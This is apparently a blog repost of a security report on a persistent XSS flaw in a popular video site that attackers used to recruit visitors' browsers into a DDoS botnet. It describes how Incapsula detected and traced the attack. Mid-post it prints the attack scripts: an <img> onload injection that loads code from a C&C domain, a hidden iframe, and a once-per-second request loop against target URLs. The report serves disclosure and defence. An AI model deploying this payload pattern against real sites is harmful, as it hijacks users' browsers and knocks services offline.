Persistent XSS Enables Large-Scale DDoS Attack
Incapsula firm discovered the exploitation of a persistent XSS vulnerability in one of the world most popular website to run a large scale DDoS attack \. The site in question is a high profile video content provider, which allows its users to sign in with their own profiles. The DDoS attack was enabled by a Persistent XSS vulnerability that allowed the offender to inject JavaScript code into the <img> tag associated with the profile image. As a result, every time the image was used on one of the the site’s pages (e.g., in the comment section), the malicious code was also embedded inside, waiting to be executed by every future visitor to that page.
As a result, each time a legitimate visitor landed on that page, his browser automatically executed the injected JavaScript, which in turn injected a hidden <iframe> with the address of the DDoSer’s C&C domain. There, an Ajax-scripted DDoS tool hijacked the browser, forcing it to issue a DDoS request at a rate of one request per second.
Obviously one request per second is not a lot. However, when dealing with video content of 10, 20 and 30 minutes in length, and with thousands of views every minute, the attack can quickly become very large and extremely dangerous. Knowing this, the offender strategically posted comments on popular videos, effectively created a self-sustaining botnet comprising tens of thousands of hijacked browsers, operated by unsuspecting human visitors who were only there to watch a few funny cat videos.
// JavaScript Injection in &lt;img&gt; tag enabled by Persistent XSS
&lt;img src="/imagename.jpg"
onload="$.getScript('http://c&amp;cdomain.com/index.html')" /&gt;
// Malicious JavaScript opens hidden &lt;iframe&gt;
function ddos(url) {
$("body").append("&lt;iframe id='ifr11323' style='display:none;'
src='http://c&amp;cdomain.com/index.html'&gt;&lt;/iframe&gt;");
}
// Ajax DDoS tool in executes GET request every second
&lt;html&gt;&lt;body&gt;
&lt;h1&gt;Iframe&lt;/h1&gt;
&lt;script&gt;
ddos('http://www.target1.com/1.jpg',
'http://www.target2.com/1.jpg');
function ddos(url,url2){
window.setInterval(function (){
$.getScript(url);
$.getScript(url2);
},1000)
}
&lt;/script&gt;
&lt;/body&gt;&lt;/html&gt;
Malicious scripts used in the attack.
Intercepting the Attack
The attack was blocked by Incapsula’s progressive challenges and behavior-based security algorithms, made that much more effective by the predictable behavior of the DDoS tool. By intercepting the malicious requests, they were also able to track the source of the attack. "We did this by replacing the content of the target URL with a snippet of our own JavaScript, which reported the original referral source – leading us to the abused video website" Incapsula revealed.
"We were then able to replicate the Persistent XSS responsible for the attack. Once we had all of this information in hand, we quickly reached out to the site support team, offering our help in fixing the issue.
It should be noted that the original DDoS tool on the attacker’s C&C domain was replaced with a much more robust version. This leads us to believe that the previous version was a sort of POC test run. The current code is not only much more sophisticated, but it is also built for keeping track of the attack, for what seems like billing purposes. From the looks of it, someone is now using this Alexa Top 50 website to set up a chain of botnets for hire."
No comments:
Post a Comment